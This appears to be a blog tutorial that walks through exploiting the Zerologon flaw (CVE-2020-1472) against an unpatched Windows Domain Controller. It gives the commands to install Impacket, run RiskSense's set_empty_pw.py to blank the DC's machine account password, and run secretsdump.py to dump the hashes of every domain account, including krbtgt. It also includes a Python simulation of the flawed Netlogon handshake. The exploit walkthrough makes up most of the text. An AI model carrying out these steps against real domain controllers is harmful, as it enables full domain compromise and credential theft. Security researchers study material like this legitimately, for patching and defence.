CVE-2020-1472 Zerologon Exploit POC

Zerologon Exploit

Yet another Zerologon exploit POC. We will be exploiting a vulnerable (unpatched) Domain Controller by abusing the Netlogon authentication flaw, CVE-2020-1472, to reset the DC's machine account password to an empty string and then dump the domain's credentials.

Impacket 0.9.22

At the time of this writing, the exploit script depends on Impacket 0.9.22 or newer, while the current stable (packaged) version of Impacket is 0.9.21. So we need to install the newer version from source.

Current impacket stable version

Before installing a new Impacket, take a VM snapshot so you can roll back if the install breaks your existing tooling. Alternatively, you can install and run Impacket in a Docker container; you can learn more about that in this post. For the sake of this post, we will just install it on our VM.

After creating a VM snapshot, remove any existing Impacket installation with the following command:


> apt remove --purge impacket-scripts python3-impacket

Here is the link to the Impacket newer version: Impacket Link

Impacket 0.9.22


> git clone https://github.com/SecureAuthCorp/impacket.git

> cd impacket

> pip install .

Exploitation

We will be using the set_empty_pw.py script from RiskSense's zerologon repository:


> git clone https://github.com/risksense/zerologon.git

> cd zerologon

And now run the script against the Domain Controller. `<DC-NAME>` is the DC's NetBIOS computer name without the trailing `$` (the script appends it itself), and `<ip-address>` is the DC's IP:


> python3 set_empty_pw.py <DC-NAME> <ip-address>

running set_empty_pw.py

The script retries the Netlogon authentication with an all-zero client challenge and credential until the DC accepts it (each attempt has about a 1-in-256 chance, so expect a few hundred attempts) and then calls NetrServerPasswordSet2 to set an empty password. If the script ran successfully, the DC's machine account password stored in Active Directory is now empty. Note that this password no longer matches the one the DC keeps in its local LSA secrets, which breaks the DC's own Netlogon channel (and with it replication and other domain services) until it is restored; the same repository ships reinstall_original_pw.py for putting the original password back once you have recovered its hash, so do not skip that step on anything you care about.
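To see why sending all zeros works, here is an added, self-contained simulation of the flawed Netlogon handshake. It is example code written for this post, not the RiskSense script or Impacket's implementation. The session-key derivation (HMAC-SHA256 over the two challenges, truncated to 16 bytes) and the credential computation (CFB8 with a fixed all-zero IV) follow MS-NRPC, but AES-128 is replaced by a SHA-256-based keyed block function so the demo runs without a crypto library (an assumption that does not change the property being shown, which only needs the first output byte of the block cipher to be uniform), and the machine-account NT hash is a constructed value.

```python
import hashlib
import hmac
import random

BLOCK = 16  # AES block size; our stand-in produces 16-byte outputs too


def toy_block_cipher(key: bytes):
    """Stand-in for AES-128 (assumption: not real AES, a keyed 16-byte PRF
    from SHA-256). CFB8 only ever calls the forward direction, and the
    Zerologon property depends only on the first output byte being uniform."""
    def encrypt_block(block: bytes) -> bytes:
        assert len(block) == BLOCK
        return hashlib.sha256(key + block).digest()[:BLOCK]
    return encrypt_block


def cfb8_encrypt(encrypt_block, iv: bytes, plaintext: bytes) -> bytes:
    """Generic CFB8: encrypt the 16-byte shift register, XOR its first byte
    with one plaintext byte, then shift that ciphertext byte into the register."""
    shift = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = encrypt_block(bytes(shift))[0]
        c = p ^ keystream_byte
        out.append(c)
        shift = shift[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """ComputeNetlogonCredential, AES flavour: CFB8 over the 8-byte challenge
    with a hard-coded all-zero IV. The fixed IV is the Zerologon bug: if the
    first keystream byte is 0x00, the register never changes and every
    output byte is zero, so challenge 00..00 yields credential 00..00."""
    return cfb8_encrypt(toy_block_cipher(session_key), bytes(BLOCK), challenge)


def derive_session_key(machine_nt_hash: bytes, client_challenge: bytes,
                       server_challenge: bytes) -> bytes:
    """Netlogon AES session key: HMAC-SHA256 keyed with the machine account's
    NT hash over ClientChallenge || ServerChallenge, truncated to 16 bytes."""
    mac = hmac.new(machine_nt_hash, client_challenge + server_challenge,
                   hashlib.sha256).digest()
    return mac[:BLOCK]


def zero_credential_is_accepted(session_key: bytes) -> bool:
    """Would a client challenge of eight zero bytes produce an all-zero credential?"""
    return compute_netlogon_credential(session_key, bytes(8)) == bytes(8)


def simulate_attack(machine_nt_hash: bytes, max_attempts: int, seed: int):
    """Replay the NetrServerReqChallenge/NetrServerAuthenticate3 loop. The
    attacker knows neither the hash nor the session key and always sends
    client challenge 00..00 and credential 00..00; the DC picks a fresh random
    server challenge each time, so each attempt is an independent 1/256 shot.
    Returns the attempt number that succeeded, or None."""
    rng = random.Random(seed)
    client_challenge = bytes(8)
    forged_credential = bytes(8)
    for attempt in range(1, max_attempts + 1):
        server_challenge = bytes(rng.getrandbits(8) for _ in range(8))
        session_key = derive_session_key(machine_nt_hash, client_challenge,
                                         server_challenge)
        expected = compute_netlogon_credential(session_key, client_challenge)
        if expected == forged_credential:
            return attempt
    return None


def empirical_success_rate(trials: int, seed: int) -> float:
    """Fraction of random session keys for which the zero credential is accepted
    (should sit near 1/256 ~ 0.0039)."""
    rng = random.Random(seed)
    hits = sum(zero_credential_is_accepted(bytes(rng.getrandbits(8) for _ in range(16)))
               for _ in range(trials))
    return hits / trials


if __name__ == "__main__":
    # Constructed NT hash for the DC's machine account; the attacker never sees it.
    MACHINE_NT_HASH = bytes.fromhex("0123456789abcdef0123456789abcdef")
    print("success rate per attempt:", empirical_success_rate(20000, seed=7))
    print("forged credential accepted on attempt:",
          simulate_attack(MACHINE_NT_HASH, max_attempts=5000, seed=1))
```

The simulation makes two things concrete: the probability is per attempt, not per password (the DC hands out a new server challenge every time, so the attacker just keeps calling), and the attacker needs nothing but network access to the DC's Netlogon RPC endpoint, which is why set_empty_pw.py can loop until it wins and then reset the password in the same session.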

Dumping hashes from the DC


> secretsdump.py -just-dc <DC-NAME>\$@10.10.10.1

Replace 10.10.10.1 with your DC's IP. The `\$` keeps the shell from treating `$` as a variable, since we are authenticating as the DC's machine account (`<DC-NAME>$`). When secretsdump.py prompts for a password, just press Enter, because that account now has an empty password (or add `-no-pass` to skip the prompt). `-just-dc` replicates the NTDS.dit secrets via DRSUAPI, which gives you the NT hashes of every domain account, including the domain admins and krbtgt.

Hash dumping with secretsdump.py

And that’s it. It’s very easy to exploit, which is exactly why this CVE got a CVSS score of 10 and why the August 2020 patch should be applied everywhere. Hope you guys enjoyed it.

If you want to learn more about this exploit, Heath (TCM) has done a great video explaining it. Here is the video: ZeroLogon Exploit - Abusing CVE-2020-1472 (Way Too Easy!)